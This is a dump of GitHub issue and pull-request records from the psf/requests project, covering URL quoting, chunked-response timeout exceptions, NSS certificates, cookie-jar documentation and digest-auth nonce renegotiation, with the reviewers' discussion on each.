{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2394/reactions" }
https://api.github.com/repos/psf/requests/issues/2394/timeline
null
completed
null
null
false
[ "This is a duplicate of #2255.\n" ]
https://api.github.com/repos/psf/requests/issues/2393
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2393/labels{/name}
https://api.github.com/repos/psf/requests/issues/2393/comments
https://api.github.com/repos/psf/requests/issues/2393/events
https://github.com/psf/requests/pull/2393
52,945,755
MDExOlB1bGxSZXF1ZXN0MjY2MTAxMjk=
2,393
Attempt to quote anyway if unquoting fails
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
9
2014-12-27T02:06:03Z
2021-09-08T09:00:59Z
2015-01-27T18:24:34Z
CONTRIBUTOR
resolved
Fixes #2356 TODO - [x] Add test
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2393/reactions" }
https://api.github.com/repos/psf/requests/issues/2393/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2393.diff", "html_url": "https://github.com/psf/requests/pull/2393", "merged_at": "2015-01-27T18:24:34Z", "patch_url": "https://github.com/psf/requests/pull/2393.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2393" }
true
[ "Looks fine, modulo a test. =)\n", "where does the list of safe characters come from? maybe this could be pulled into a named var for clarity?\n", "## It comes from the RFCs\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Update?\n", "Update: forgotten. I've been really busy lately but I'll prioritize this. Sorry for losing track of it.\n", "Added two tests and gave the strings slightly better names. Not sure we need to spell out every last RFC referenced in the comments though since they're all pretty well known. @Lukasa I'd appreciate some review.\n", "Some small notes. =)\n", "@Lukasa forgot to mention this was updated to address your feedback.\n", "LGTM. :+1: \n" ]
https://api.github.com/repos/psf/requests/issues/2392
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2392/labels{/name}
https://api.github.com/repos/psf/requests/issues/2392/comments
https://api.github.com/repos/psf/requests/issues/2392/events
https://github.com/psf/requests/issues/2392
52,934,168
MDU6SXNzdWU1MjkzNDE2OA==
2,392
requests.exceptions.ReadTimeout is not raised when response is chunked
{ "avatar_url": "https://avatars.githubusercontent.com/u/1444666?v=4", "events_url": "https://api.github.com/users/nickjoyce-wf/events{/privacy}", "followers_url": "https://api.github.com/users/nickjoyce-wf/followers", "following_url": "https://api.github.com/users/nickjoyce-wf/following{/other_user}", "gists_url": "https://api.github.com/users/nickjoyce-wf/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/nickjoyce-wf", "id": 1444666, "login": "nickjoyce-wf", "node_id": "MDQ6VXNlcjE0NDQ2NjY=", "organizations_url": "https://api.github.com/users/nickjoyce-wf/orgs", "received_events_url": "https://api.github.com/users/nickjoyce-wf/received_events", "repos_url": "https://api.github.com/users/nickjoyce-wf/repos", "site_admin": false, "starred_url": "https://api.github.com/users/nickjoyce-wf/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/nickjoyce-wf/subscriptions", "type": "User", "url": "https://api.github.com/users/nickjoyce-wf", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" }, { "color": "e102d8", "default": false, "description": null, "id": 117745, "name": "Planned", "node_id": "MDU6TGFiZWwxMTc3NDU=", "url": "https://api.github.com/repos/psf/requests/labels/Planned" }, { "color": "eb6420", "default": false, "description": null, "id": 44501256, "name": "Breaking API Change", "node_id": "MDU6TGFiZWw0NDUwMTI1Ng==", "url": "https://api.github.com/repos/psf/requests/labels/Breaking%20API%20Change" } ]
open
false
null
[]
{ "closed_at": null, "closed_issues": 29, "created_at": "2013-11-17T11:29:34Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }, "description": null, "due_on": null, "html_url": "https://github.com/psf/requests/milestone/20", "id": 487518, "labels_url": "https://api.github.com/repos/psf/requests/milestones/20/labels", "node_id": "MDk6TWlsZXN0b25lNDg3NTE4", "number": 20, "open_issues": 12, "state": "open", "title": "3.0.0", "updated_at": "2024-05-19T18:43:00Z", "url": "https://api.github.com/repos/psf/requests/milestones/20" }
5
2014-12-26T18:19:10Z
2018-01-12T23:43:42Z
null
NONE
null
https://gist.github.com/nickjoyce-wf/c536f2573ef124115f86 When a request has a timeout param supplied and the response is chunked but does not return enough data in time, `requests.exceptions.ReadTimeout` should be raised. ``` shell $ mkvirtualenv test (test)$ pip install requests werkzeug (test)$ python server.py ``` In another terminal: ``` shell $ workon test (test)$ python client.py ``` Expected results: `requests.exceptions.ReadTimeout` is raised due to response not being sent within the timeout specified by `requests.get`. Actual results: ``` Traceback (most recent call last): File "client.py", line 3, in <module> requests.get('http://127.0.0.1:8000/', timeout=0.5) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/api.py", line 65, in get return request('get', url, **kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/sessions.py", line 610, in send r.content File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/models.py", line 730, in content self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes() File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/models.py", line 662, in generate raise ConnectionError(e) requests.exceptions.ConnectionError: HTTPConnectionPool(host='127.0.0.1', port=8000): Read timed out. 
``` Recorded http request/response via Wireshark: ``` GET / HTTP/1.1 Host: 127.0.0.1:8000 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.5.1 CPython/2.7.9 Darwin/13.4.0 HTTP/1.0 200 OK Content-type: text/plain Transfer-Encoding: chunked Connection: close Server: Werkzeug/0.9.6 Python/2.7.9 Date: Fri, 26 Dec 2014 17:51:21 GMT ``` Tested with requests==2.5.1
null
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2392/reactions" }
https://api.github.com/repos/psf/requests/issues/2392/timeline
null
null
null
null
false
[ "Just to be really clear, the bug here is that exception we're raising is wrong. We're raising a `ConnectionError`, not a `ReadTimeoutError`.\n", "At this point though, people are almost certainly wrapping their code in except blocks for `ConnectionError` but most likely not in [`ReadTimeout`](https://github.com/kennethreitz/requests/blob/2d1ffad80bdfbefcb1922e0129fca28d493d3fb0/requests/exceptions.py#L62). We can't exactly just change this under their feet in 2.5.x, or 2.x. We'll have to wait for 3.0 for this.\n", "Can an exception be thrown when access response content i.e:\ncontent = r.text\n\ncan the above statement throw the following exception:\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='<some website>', port=80): Read timed out\n", "Yes, if you set `stream=True`. Otherwise, no.\n\nIn future, it's better if you can ask these questions on Stack Overflow: this issue tracker is really meant for bugs only. =)\n", "> people are almost certainly wrapping their code in except blocks for `ConnectionError` but most likely not in `ReadTimeout`\r\n\r\nOn contrary, people who set timeout are most likely wrapping their code in except blocks for `ReadTimeout` already, because this exception is thrown from the send request function." ]
https://api.github.com/repos/psf/requests/issues/2391
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2391/labels{/name}
https://api.github.com/repos/psf/requests/issues/2391/comments
https://api.github.com/repos/psf/requests/issues/2391/events
https://github.com/psf/requests/issues/2391
52,846,724
MDU6SXNzdWU1Mjg0NjcyNA==
2,391
Using python-nss for SSL
{ "avatar_url": "https://avatars.githubusercontent.com/u/1172008?v=4", "events_url": "https://api.github.com/users/mrniranjan/events{/privacy}", "followers_url": "https://api.github.com/users/mrniranjan/followers", "following_url": "https://api.github.com/users/mrniranjan/following{/other_user}", "gists_url": "https://api.github.com/users/mrniranjan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mrniranjan", "id": 1172008, "login": "mrniranjan", "node_id": "MDQ6VXNlcjExNzIwMDg=", "organizations_url": "https://api.github.com/users/mrniranjan/orgs", "received_events_url": "https://api.github.com/users/mrniranjan/received_events", "repos_url": "https://api.github.com/users/mrniranjan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mrniranjan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mrniranjan/subscriptions", "type": "User", "url": "https://api.github.com/users/mrniranjan", "user_view_type": "public" }
[ { "color": "777777", "default": false, "description": null, "id": 162780722, "name": "Question/Not a bug", "node_id": "MDU6TGFiZWwxNjI3ODA3MjI=", "url": "https://api.github.com/repos/psf/requests/labels/Question/Not%20a%20bug" } ]
closed
true
null
[]
null
1
2014-12-25T04:13:48Z
2021-09-08T23:06:14Z
2014-12-25T09:12:44Z
NONE
resolved
For HTTPS URLs where certificate verification is required, I would like to use certificates/keys stored in an NSS database (Mozilla NSS). There is a python-nss module which provides the interface to access the NSS database. Is there a way I can use the requests module with python-nss? Any hints on how to achieve this would be helpful.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2391/reactions" }
https://api.github.com/repos/psf/requests/issues/2391/timeline
null
completed
null
null
false
[ "Currently, requests cannot use python-nss directly. Assuming all you want to do is use the certificates and keys, you'll need to transform them into a `.pem` file that OpenSSL can read. That's extremely painful, I'm afraid, as OpenSSL does not let you pass it `.pem` files in memory.\n\nUnfortunately, enhancing requests to do this is extremely tricky and really needs to be done lower down the stack. At this time, there is no plan to do that work: certainly not in the requests project.\n\nI'm sorry I can't be more helpful.\n" ]
https://api.github.com/repos/psf/requests/issues/2390
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2390/labels{/name}
https://api.github.com/repos/psf/requests/issues/2390/comments
https://api.github.com/repos/psf/requests/issues/2390/events
https://github.com/psf/requests/pull/2390
52,821,935
MDExOlB1bGxSZXF1ZXN0MjY1NjA1OTQ=
2,390
Clean up cookie docstrings, document cookie jar.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-24T14:35:19Z
2021-09-08T09:01:03Z
2014-12-24T15:15:37Z
MEMBER
resolved
Following on from [a Stack Overflow question](https://stackoverflow.com/questions/27586779/requests-inability-to-handle-two-cookies-with-same-name-different-domain), this PR extends our cookie documentation [here](http://docs.python-requests.org/en/latest/api/#cookies) to document the cookie jar itself. This should make it more likely that users are able to discover how to make more subtle queries about cookies.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2390/reactions" }
https://api.github.com/repos/psf/requests/issues/2390/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2390.diff", "html_url": "https://github.com/psf/requests/pull/2390", "merged_at": "2014-12-24T15:15:37Z", "patch_url": "https://github.com/psf/requests/pull/2390.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2390" }
true
[ "A couple comments. I'm also wondering if there would be use in the toolbelt for a class that extends this so that you can do \n\n```\ns.cookies['cookie-name', 'domain', 'path']\n```\n\nIf you use the custom cookie-jar. I do and don't like it. Alternatively, we could just include the recipe for the user in the documentation. It's not hard\n\n``` python\nclass SpecialJar(requests.cookies.RequestsCookieJar):\n def __getitem__(self, name):\n if isinstance(name, str):\n return self._find_no_duplicates(name)\n if not isinstance(name, tuple):\n raise ValueError(\"Expected a string or a tuple but received {0}\".format(type(name)))\n if len(name) == 2:\n path = None\n cookie_name, domain = name\n elif len(name) == 3:\n cookie_name, domain, path = name\n # Raise another ValueError in an else?\n\n return self._find_no_duplicates(cookie_name, domain=domain, path=path)\n```\n", "Updates made.\n\nAs for the toolbelt extension, that might be worthwhile, though I'm not sure I see the advantage. `.get()` is surely more natural (or at least seems that way to me).\n", "Yeah it seems that way to me too. My problem with it is that default comes before domain and path so I expect people will not realize they need to use the keywords for domain and path to skip using a default.\n", "Yeah, that's true, but it means that those who think `Session.cookies` is a dict get the behaviour they expect. Lesser of two evils, IMO.\n" ]
https://api.github.com/repos/psf/requests/issues/2389
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2389/labels{/name}
https://api.github.com/repos/psf/requests/issues/2389/comments
https://api.github.com/repos/psf/requests/issues/2389/events
https://github.com/psf/requests/pull/2389
52,755,390
MDExOlB1bGxSZXF1ZXN0MjY1MTk3OTU=
2,389
Fix bug in renegotiating a nonce with the server
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-12-23T16:43:36Z
2021-09-08T09:01:06Z
2014-12-23T17:40:35Z
CONTRIBUTOR
resolved
If a session runs long enough (without constant activity) then the server can expire the nonce the session has negotiated. If that happens the session will get a new 401 response which we were immediately returning to the user. A user would then have to essentially reinitialize session.auth each time they get an unexpected 401. Also, there's no need for setattr calls when we can simply assign the attribute on the instance.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2389/reactions" }
https://api.github.com/repos/psf/requests/issues/2389/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2389.diff", "html_url": "https://github.com/psf/requests/pull/2389", "merged_at": "2014-12-23T17:40:35Z", "patch_url": "https://github.com/psf/requests/pull/2389.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2389" }
true
[ "LGTM. :cake:\n", "@Lukasa I'm just waiting for @Jaypipes to verify this fixes their issues.\n", "@sigmavirus24 I have now verified that this fixes the issue I was seeing. Thanks very much! :)\n", "Cool. @Lukasa I'm going to cut 2.5.1 with this because it's a rather serious bug. (I have to wonder if it could be considered a CVE because someone could perform a denial of service on a client if it knows the clients behaviour and when to expire the nonce.)\n", "Fine by me.\n" ]
https://api.github.com/repos/psf/requests/issues/2388
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2388/labels{/name}
https://api.github.com/repos/psf/requests/issues/2388/comments
https://api.github.com/repos/psf/requests/issues/2388/events
https://github.com/psf/requests/pull/2388
52,699,213
MDExOlB1bGxSZXF1ZXN0MjY0ODc0MTc=
2,388
Handle empty chunks
{ "avatar_url": "https://avatars.githubusercontent.com/u/1743810?v=4", "events_url": "https://api.github.com/users/neosab/events{/privacy}", "followers_url": "https://api.github.com/users/neosab/followers", "following_url": "https://api.github.com/users/neosab/following{/other_user}", "gists_url": "https://api.github.com/users/neosab/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/neosab", "id": 1743810, "login": "neosab", "node_id": "MDQ6VXNlcjE3NDM4MTA=", "organizations_url": "https://api.github.com/users/neosab/orgs", "received_events_url": "https://api.github.com/users/neosab/received_events", "repos_url": "https://api.github.com/users/neosab/repos", "site_admin": false, "starred_url": "https://api.github.com/users/neosab/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/neosab/subscriptions", "type": "User", "url": "https://api.github.com/users/neosab", "user_view_type": "public" }
[ { "color": "e102d8", "default": false, "description": null, "id": 117745, "name": "Planned", "node_id": "MDU6TGFiZWwxMTc3NDU=", "url": "https://api.github.com/repos/psf/requests/labels/Planned" }, { "color": "eb6420", "default": false, "description": null, "id": 44501256, "name": "Breaking API Change", "node_id": "MDU6TGFiZWw0NDUwMTI1Ng==", "url": "https://api.github.com/repos/psf/requests/labels/Breaking%20API%20Change" }, { "color": "e11d21", "default": false, "description": null, "id": 78002701, "name": "Do Not Merge", "node_id": "MDU6TGFiZWw3ODAwMjcwMQ==", "url": "https://api.github.com/repos/psf/requests/labels/Do%20Not%20Merge" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" } ]
